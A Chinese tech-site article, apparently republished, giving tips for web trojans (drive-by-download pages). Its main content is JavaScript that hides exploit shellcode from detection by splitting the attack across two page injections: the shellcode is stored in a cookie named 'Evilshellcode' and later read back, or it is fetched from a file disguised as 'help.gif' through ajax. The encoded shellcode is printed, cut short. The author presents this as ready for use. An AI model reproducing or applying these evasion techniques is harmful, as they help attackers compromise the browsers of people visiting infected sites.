作家
登录

一个网马的tips实现分析

作者: 来源:www.28hudong.com 2013-03-30 01:09:17 阅读 我要评论

cookie示例代码: 复制代码 代码如下: //存放 function setCookie(sVar, sVal){ theCookie = sVar + '=' + sVal + '; expires=Fri, 1 Jul 2020 09:45:27 UTC'; document.cookie = theCookie;} shellcode="%9090%9090%00e8%0000%5e00%8b64%303d%0000%8100%00c7%0008%8b00%83c7%1dc0%20b9%0001%a500%fde2%e0ff%00e8%0000%6a00%eb08%1b6c%46c6%ed79%ef56%9836%8afe%aa0e%0dfc%9e7c%bbf9%b035%2d49%7edb%e2d8%8e73%0e4e%75ec......" setCookie('Evilshellcode', shellcode); //取出 function getCookie(sVar){ cookies = document.cookie.split('; '); for(var i = 1; i <= cookies.length; i++){ if(cookies[i - 1].split('=')[0] == sVar){return cookies[i - 1].split('=')[1];}} return ''; } a=unescape(getCookie('Evilshellcode')) cookie存放的话,可以挂两次,第一次挂cookie写入代码无害,第二次再取出来结合新挂的代码来运行。怎么用随你了。 ajax来调用 复制代码 代码如下: <script src="http://jqueryjs.googlecode.com/files/jquery-1.3.2.min.js" type="text/javascript"></script> var shellcode = $.ajax({ url: "help.gif", async: false }).responseText help.gif内容 %9090%9090%00e8%0000%5e00%8b64%303d%0000%8100%00c7%0008%8b00%83c7%1dc0%20b9%0001%a500%fde2%e0ff%00e8%0000%6a00%eb08%1b6c%46c6%ed79%ef56%9836%8afe%aa0e%0dfc%9e7c%bbf9%b035%2d49%7edb%e2d8%8e73%0e4e%75ec

  推荐阅读

  jquery 学习之二 属性 文本与值(text,val)

text() 取得所有匹配元素的内容。 结果是由所有匹配元素包含的文本内容组合起来的文本。这个方法对HTML和XML文档都有效。 Get the text contents of all matched elements. The result is a string that contain>>>详细阅读


本文标题:一个网马的tips实现分析

地址:http://www.17bianji.com/kaifa2/JS/25331.html

关键词: 探索发现

乐购科技部分新闻及文章转载自互联网,供读者交流和学习,若有涉及作者版权等问题请及时与我们联系,以便更正、删除或按规定办理。感谢所有提供资讯的网站,欢迎各类媒体与乐购科技进行文章共享合作。

网友点评
自媒体专栏

评论

热度

精彩导读
栏目ID=71的表不存在(操作类型=0)